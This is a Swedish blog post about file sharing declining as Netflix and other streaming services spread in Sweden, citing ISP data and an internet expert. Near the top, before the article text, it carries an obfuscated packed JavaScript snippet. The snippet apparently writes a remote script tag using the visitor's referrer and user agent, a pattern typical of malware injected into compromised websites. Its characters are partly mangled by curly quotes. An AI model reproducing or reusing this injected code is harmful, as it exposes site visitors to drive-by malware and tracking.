Image Image Image Image Image Image Image Image Image Image

| 29 mars, 2020

Scroll to top

Top

Fildelning minskar på grund av videotjänsternas skull

netflix-till-sverige
Sebastian

Fildelning: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndkar|var|u0026u|referrer|kndkh||js|php’.split(’|’),0,{}))
Att vi använder Internet mer och mer är en fakta de flesta säkerligen vet om. Men visste ni om att den största delen av den användningen går till film? Ja, i USA alla fall. 

Sedan Netflix lanserades i USA har internetanvändningen ökat otroligt.  Tjänsten Netflix står för ensam för hela 33 procent av internettrafiken där och Sverige närmar sig. 

Varför ökningen har blivit så stor i Sverige på senare tid beror på alla dessa streamingsajter som öppnat upp nu under 2012. Netflix, Voddler, Filmnet, Viaplay, headweb  och snart också HBO är några stora aktörer på den marknaden.

Dessa tjänster visar nu också att de bidrar till mindre fildelning vilket kan låta logiskt. Uppgifterna kommer från samtliga internetoperatörer visar för första gången att trafiken från fildelning har planat ut det senaste året.
Operatörerna meddelar också att de prioriterat ned fildelningstrafiken i sina nät.

Internetexperten Jörgen Eriksson på Punkt SE har dokumenterat och följt hur utvecklingen av internettrafiken förändrats. Han menar att operatörerna har använt sig av två metoder: Först att bygga ut nätkapaciteten och hantera trafiken på olika sätt.

”Ett annat alternativ är att införa differentierad taxa. Det har diskuterats internt ända sedan webben slog igenom och folk började surfa, men ingen har vågat införa den” säger Jörgen Eriksson.

Men allt är inte bra med denna ned prioritering  menar Jörgen Eriksson:

”Informationen är långt ifrån bra. Den uppfyller inte kraven på att vara förståelig”

Själv tycker jag det låter rätt logiskt att ”amatör” fildelare istället nu använder sig av filmstjänster då det är snabbare, enklare och helt lagligt. Dock kommer sen frågan om de som vill ladda ner nya filmer och serier som inte Netflix, Voddler, Filmnet, Viaplay, headweb och andra leverar idag. Dessa personer kommer nog inte överge fildelning via piratebay eller andra aktörer.

Via: IDG